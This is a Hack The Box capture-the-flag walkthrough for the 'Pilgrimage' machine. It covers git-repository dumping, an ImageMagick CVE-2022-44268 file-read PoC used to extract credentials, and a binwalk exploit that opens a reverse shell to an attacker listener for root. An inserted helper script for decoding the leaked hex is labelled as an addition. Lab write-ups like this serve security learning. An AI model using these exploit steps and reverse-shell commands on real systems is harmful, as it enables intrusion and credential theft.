HTB: Pilgrimage

Easy HTB machine where a website is used to reduce the size of images. An ImageMagick exploit is then used for a file read vulnerability, through which the SQLite3 database can be enumerated.

Enumeration

nmap shows ports 22 and 80 open.


$ nmap -sC -sV -oN nmap/default_ports -v 10.10.11.219
Nmap scan report for 10.10.11.219
Host is up (0.029s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
|   256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_  256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Besides this scan of the default ports, I also run a port scan on all ports using -p- to make sure I don’t miss anything. The results from this were the same.

I add the following line to my /etc/hosts file: 10.10.11.219 pilgrimage.htb

And the following website shows:
https://i.imgur.com/Y0hOKoa.png

I can register for an account
https://i.imgur.com/2oLQtgt.png

I can upload a file and shrink it, after which I receive a long URL to the shrunken file.
https://i.imgur.com/7O5XHY2.png

https://i.imgur.com/XYKO0No.png

Let’s test whether I can upload a malicious PHP reverse shell or web shell.
No luck: uploading a malicious PHP web shell does not work.

I turn back and enumerate the box again, maybe I missed something. And yes, I did miss something: after the initial enumeration I added pilgrimage.htb to my /etc/hosts file, but before that nmap couldn’t run the other scripts against the domain. So I re-ran the nmap scan on port 80, and this time it also showed http-git:


http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...

Great, now I can use GitDump to retrieve all the files.

GitDump


$ python3 ~/github/GitDump/git-dump.py http://pilgrimage.htb/.git/
URL for test: http://pilgrimage.htb/.git/
Fetching: http://pilgrimage.htb/.git/index
Fetching: http://pilgrimage.htb/.git/FETCH_HEAD
Fetching: http://pilgrimage.htb/.git/HEAD
Fetching: http://pilgrimage.htb/.git/ORIG_HEAD
Fetching: http://pilgrimage.htb/.git/config
Fetching: http://pilgrimage.htb/.git/description
Fetching: http://pilgrimage.htb/.git/packed-refs
Fetching: http://pilgrimage.htb/.git/info/exclude
Fetching: http://pilgrimage.htb/.git/info/refs
Fetching: http://pilgrimage.htb/.git/logs/HEAD

Script Executed Successfully
Run following command to retrieve source code: cd output && git checkout -- .

And I end up with all these files:
https://i.imgur.com/dLZNqwi.png

Shell as Emily

The site uses ImageMagick to process the uploaded files, version 7.1.0-49:
https://i.imgur.com/ZbvPZxg.png

A quick Google search gets me to a GitHub page with an exploit for CVE-2022-44268.

I first generate a malicious PNG file:


$ python3 exploit.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research 
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png

I then upload that file via the web interface, so it gets compressed using ImageMagick, and download the result again.
https://i.imgur.com/maPhNbS.png

I then use the ImageMagick binary from the git repository (the same one used on the live server) to identify the result:


$ ./magick identify -verbose result.png

From there I copy the hex data under Raw profile type and paste it into the following snippet:


python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'

It then dumps all the /etc/passwd data! Great. I could of course read the user flag this way, but I want to do it via a shell session.

Now the question is: what files do I want to read?
After looking through the git files again, especially register.php, I noticed the following code snippet, which shows where usernames and passwords are saved. Let’s try to read this file via the vulnerability.
https://i.imgur.com/Wp8IbsK.png

After doing the same process as before, but now with /var/db/pilgrimage, I ended up with a gigantic hex file that I somehow need to turn back into an SQLite database.

I found the following Stack Overflow question that explains how to turn the hex back into binary so I can read it with sqlite3:

xxd -r -p db_raw_oneline.hx db.bin

I now open this file with sqlite3 db.bin. Since I am unfamiliar with the syntax, I check out this quick and easy guide. And there we have a password for emily; as you might remember, emily was also in the /etc/passwd dump.
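The two manual decoding steps above (the python one-liner for /etc/passwd and the xxd -r -p step for the SQLite file) can be done in one go with the helper below, an added example that is not part of the original writeup or of the PoC. It parses every "Raw profile type" block out of magick identify -verbose output, rejoins the wrapped hex, checks it against the declared byte count and returns the embedded bytes, which is also how an incident responder can see exactly what a processed image pulled off a server; the sample identify output is constructed, not captured from the box, and the script name rawprofile.py is assumed.

```python
import re
import sys
from typing import Dict

# Header line that `magick identify -verbose` prints for each raw profile,
# e.g. "    Raw profile type:" or "    Raw profile type xmp:".
_HEADER = re.compile(r"^\s*Raw profile type\s*([^:]*):\s*$")
_HEX_LINE = re.compile(r"^[0-9a-fA-F]+$")


def extract_raw_profiles(identify_output: str) -> Dict[str, bytes]:
    """Return {profile_name: decoded_bytes} for every raw profile block.

    Block layout: header line, blank line(s), a decimal byte count, then the
    payload as hex wrapped over many lines until the first non-hex line.
    """
    profiles: Dict[str, bytes] = {}
    lines = identify_output.splitlines()
    i = 0
    while i < len(lines):
        header = _HEADER.match(lines[i])
        i += 1
        if not header:
            continue
        name = header.group(1).strip() or "default"
        while i < len(lines) and not lines[i].strip():  # skip blank lines
            i += 1
        if i >= len(lines) or not lines[i].strip().isdigit():
            continue  # no byte count: not a raw profile block we understand
        declared = int(lines[i].strip())
        i += 1
        hex_parts = []
        while i < len(lines) and _HEX_LINE.match(lines[i].strip()):
            hex_parts.append(lines[i].strip())
            i += 1
        data = bytes.fromhex("".join(hex_parts))
        if len(data) != declared:  # pasted block was truncated or altered
            print(f"warning: {name}: declared {declared} bytes, "
                  f"decoded {len(data)}", file=sys.stderr)
        profiles[name] = data
    return profiles


# Constructed sample shaped like the identify output for a shrunk image that
# carries two lines of /etc/passwd; not real output from the box.
_SAMPLE_CONTENT = (b"root:x:0:0:root:/root:/bin/bash\n"
                   b"emily:x:1000:1000::/home/emily:/bin/bash\n")
_hex = _SAMPLE_CONTENT.hex()
SAMPLE_IDENTIFY = (
    "  Properties:\n"
    "    date:create: 2023-06-25T12:00:00+00:00\n"
    "    Raw profile type:\n\n"
    f"      {len(_SAMPLE_CONTENT)}\n"
    + "\n".join(_hex[j:j + 72] for j in range(0, len(_hex), 72))
    + "\n    signature: deadbeef\n"
)

if __name__ == "__main__":
    # Usage: magick identify -verbose result.png | python3 rawprofile.py db
    prefix = sys.argv[1] if len(sys.argv) > 1 else "profile"
    for pname, blob in extract_raw_profiles(sys.stdin.read()).items():
        with open(f"{prefix}_{pname}.bin", "wb") as fh:  # feed to sqlite3
            fh.write(blob)
```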

https://i.imgur.com/IUf2Ryf.png

And I successfully log in!
https://i.imgur.com/qWIQeyv.png


emily@pilgrimage:~$ cat user.txt 
8a728138955c0718*************

Shell as root

Running ps aux shows a process, malwarescan.sh, that is not normal:
https://i.imgur.com/fUyHzJY.png

It contains the following code:
https://i.imgur.com/VqPoyU5.png

The script uses binwalk, so I check its version to see if there is anything that can be exploited:
https://i.imgur.com/OLZb8oQ.png

Google gave me the following Exploit-DB post.

Using the exploit, I had to put the generated file in /var/www/pilgrimage.htb/shrunk, since that is the directory malwarescan.sh checks for files.


emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ python3 ~/.a/exploit.py  ~/.a/cat.jpeg 10.10.14.52 5555

After that I listen with nc and successfully get a shell as root.


$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.52] from (UNKNOWN) [10.10.11.219] 43648

whoami
root
cd /root
ls
quarantine
reset.sh
root.txt
cat root.txt
2d852eac9af3249d089**********